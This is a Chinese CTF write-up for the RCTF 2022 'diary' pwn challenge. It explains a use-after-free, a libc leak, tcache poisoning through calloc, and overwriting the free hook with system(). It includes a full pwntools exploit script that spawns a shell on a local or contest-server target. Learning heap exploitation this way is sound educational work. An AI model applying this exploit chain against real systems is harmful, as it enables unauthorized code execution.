RCTF-pwn-diary

RCTF-pwn-diary

赛后看了一眼发现给出了源码,https://github.com/ruan777/RCTF2022/blob/main/diary/main.cpp
漏洞是erase的问题
解释一下

add(0)
add(1)
add(2)
delete(1)

这样子的话,其实就是把2给删除,把2的内容复制到1中,所以2这里有就有个uaf

add(0)
add(1)
add(2)
delete(1)
edit(1, b'aaaaa')

当改成这样时,通过调试可以看见fd被改了
在这里插入图片描述
利用用这个特性可以uaf出libc,把unsortedbin同时打进tcache和unsortedbin中,这样的话show的时候就会show出libc
接着就需要任意地址写了,直接edit的话前面会有4个空格,所以不好改
在这里插入图片描述
可以发现在enc这个功能里会calloc,calloc并不会从tcache里取,会从unsortedbin中取出,并会将content + offest的内容复制到fd中,所以可以控制offset为4,length为8, 并提前将一个chunk的fd,edit出带有hook的地址,这样enc之后hook上的地址成功跑进tcache的fd中
在这里插入图片描述
接着需要从calloc那里取的剩下的填满,不然会发生一些错误
在这里插入图片描述
hook上的地址成功到第一位,再申请的时候就申请的是hook上的地址,这里设置的hook地址是free_hook - 8,因为add的时候前面会有4个空格, ;sh;这样4 + 3刚好是8,后面是free_hook,所以是 ;sh; + p64(system),add的时候刚好后面又后调用free_hook,就可以getshell了

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './diary'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('119.13.105.35', 10111)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'test cmd:\n'

def add(year=0, content = b'a'):
    r.sendlineafter(menu, b'add#' + str(year).encode() + b'#0#0#0#0#0#' + content)

def edit(index, content):
    r.sendlineafter(menu, b'update#' + str(index).encode() + b'#' + content)

def show(index):
    r.sendlineafter(menu, 'show#' + str(index))

def delete(index):
    r.sendlineafter(menu, 'delete#' + str(index))

def encrypt(index, offest, l):
    r.sendlineafter(menu, 'encrypt#' + str(index) + '#' + str(offest) + '#' + str(l))

def decrypt(index):
    r.sendlineafter(menu, 'decrypt#' + str(index))

for i in range(10):
    add(i)

for i in range(9, 3, -1):
    delete(i)

delete(1)

edit(2, b'aaaa')
delete(1)
show(1)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = malloc_hook - libc.sym['__malloc_hook']

free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
system_addr = libc_base + libc.sym['system']
li('system_addr = ' + hex(system_addr))

edit(0, p64(free_hook - 0x8))

encrypt(0,4,6)

add(10, b'a' * 0x2d0)

add(11, b';sh;' + p64(system_addr))

r.interactive()

在这里插入图片描述

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
信息数据从传统到当代,是一直在变革当中,突如其来的互联网让传统的信息管理看到了革命性的曙光,因为传统信息管理从时效性,还是安全性,还是可操作性等各个方面来讲,遇到了互联网时代才发现能补上自古以来的短板,有效的提升管理的效率和业务水平。传统的管理模式,时间越久管理的内容越多,也需要更多的人来对数据进行整理,并且数据的汇总查询方面效率也是极其的低下,并且数据安全方面永远不会保证安全性能。结合数据内容管理的种种缺点,在互联网时代都可以得到有效的补充。结合先进的互联网技术,开发符合需求的软件,让数据内容管理不管是从录入的及时性,查看的及时性还是汇总分析的及时性,都能让正确率达到最高,管理更加的科学和便捷。本次开发的医院后台管理系统实现了病房管理、病例管理、处方管理、字典管理、公告信息管理、患者管理、药品管理、医生管理、预约医生管理、住院管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让医院后台管理系统更能从理念走到现实,确确实实的让人们提升信息处理效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值